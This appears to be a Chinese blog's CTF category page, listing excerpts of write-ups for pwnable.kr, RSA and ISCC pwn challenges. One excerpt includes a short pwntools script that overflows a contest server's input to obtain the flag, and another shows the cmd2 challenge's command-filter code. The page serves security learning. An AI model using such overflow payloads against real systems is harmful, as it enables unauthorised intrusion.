![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
文章平均质量分 68
bluestar628
在校大学生
展开
-
pwnable 之collision
pwnable collision原创 2017-03-28 13:43:25 · 1154 阅读 · 0 评论 -
Crypto
RSA1RSA1和RSA2是一样的代码。整个然后告诉了我们大整数N,公钥e。然后告诉我们flag使用该私钥e加密。加密方法就是典型的RSA,即求flag的e次方然后模N1。 根据大整数N1后面的提示,我们可以直接将N1分解,有一个在线分解大整数的网站:http://factordb.com/得到N1=p*q=41 · 4009469095092088103068373529276146838921...原创 2018-07-12 18:51:16 · 1131 阅读 · 3 评论 -
Pwn
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import *p = remote ("139.224.220.67" ,30004)payload = 'a'*0x501p.sendline(payload)p.interactive()Pwn2打开IDA分析,是一个经...原创 2018-07-11 21:50:35 · 2467 阅读 · 0 评论 -
pwnable.kr 之simplelogin
这道题目还是很有意思的。是自从参加了一次pwn培训之后的第一道题目,感觉确实比以前舒服多了。 下载题目,IDA反汇编,基本逻辑很简单,输入一个字符串,进行base64解密,然后比对长度,如果超过12个就直接报错。 漏洞点找了很久,这个漏洞点确实很巧妙。开始的时候,checksec了一下。 发现开启了栈执行保护,和缓冲区溢出保护。所以直接放弃了栈溢出这个思路,原创 2017-12-09 17:40:23 · 341 阅读 · 0 评论 -
IDA常见宏定义
* This file contains definitions used by the Hex-Rays decompiler output. It has type definitions and convenience macros to make the output more readable. Copyright (c) 2007-2011 Hex-Rays转载 2017-11-02 20:14:57 · 3518 阅读 · 0 评论 -
pwnable之input
第一题还可以用脚本来做,只要把文件分隔符设置为一个其他符号就可以了,这里我们设为“-”但是第二题就不那么简单了。IFS='-'//设置分隔符为“-”./input `python-c 'pr原创 2017-04-04 18:42:34 · 1016 阅读 · 0 评论 -
pwnable.kr之uaf
Uaf-useafter free是指堆在被释放后,因为指针没有置为0,从而导致的可以利用这个指针重新利用本应该被释放空间的漏洞。一般情况下,包含这个漏洞会导致程序崩溃,但是如果别有用心者,把这块空间利用起来,比如c++new一个class的时候,里面经常后包含大量的函数指针,而且经常会被调用,如果我们把这个指针覆盖成我们想要执行的地址,那么当后面错误地调用这个函数的时候,就会导致我们的代码执行,原创 2017-04-13 12:54:25 · 497 阅读 · 0 评论 -
pwnable.kr之cmd2
#include #include int filter(char* cmd){ intr=0; r+= strstr(cmd, "=")!=0; r+= strstr(cmd, "PATH")!=0; r+= strstr(cmd, "export")!=0; r+= strstr(cmd, "原创 2017-04-12 19:53:03 · 1845 阅读 · 2 评论 -
pwn题解第一道
今天听说了一个网站pwnable.kr。很适合初学者,就试着做了一道题目。第一道题目,按照网页上给的链接,使用putty链接工具联入。输入ls命令查看文件内容。很开心的看到了flag文件,于是直接打开,果然不出所料,我是没有权限打开的。然后查看了一下fd.c的代码。#include #include #include char buf[32];int main(in原创 2017-03-24 22:36:00 · 1826 阅读 · 1 评论 -
pwnable.kr coin1
# coding: utf-8from socket import*import randomimport timeHOST = '0.0.0.0'PORT = 9007# 建立socket对象client = socket(AF_INET, SOCK_STREAM)# AF_INET表示将使用标准的ipv4地址或主机名# SOCK_STREAM说明这是一个TCP客户转载 2017-04-08 23:12:20 · 532 阅读 · 1 评论 -
pwnable.kr之leg ARM指令初步了解
汇编语言分为好多种,在这道题中展示的是ARM指令集,ARM指令集还包含一种thumb指令集,thumb指令集的出现时为了应对早起的开发者面对的内存不足而设计的,因为thumb指令集和ARM指令集看起来没什么不一样,但是在生成的时候,thumb指令集可以使得可执行文件更小一点。ARM到thumb之间的跳转互换用的是bx,blx。后来由于在开发过程中容易被跳来跳去弄昏头,所以发明了thumb2指令原创 2017-04-07 00:10:14 · 634 阅读 · 0 评论 -
ISCC2018线下赛私地pwn
拿到题目,还是首先checksec,看开了什么保护。开启了栈溢出检查,和栈执行保护。首先这个题目,需要过四个phase,然后就能print_flag打印flag有点像计算机系统拆炸弹。phase_1第一个炸弹要求输入一个数x,使得3*(2*x/37-18)-1=1337.这里推荐一个z3求解器。可以很好的解决一些求解不等式,求解方程的问题。phase_2要求输入一串数组...原创 2018-10-24 14:04:58 · 1184 阅读 · 0 评论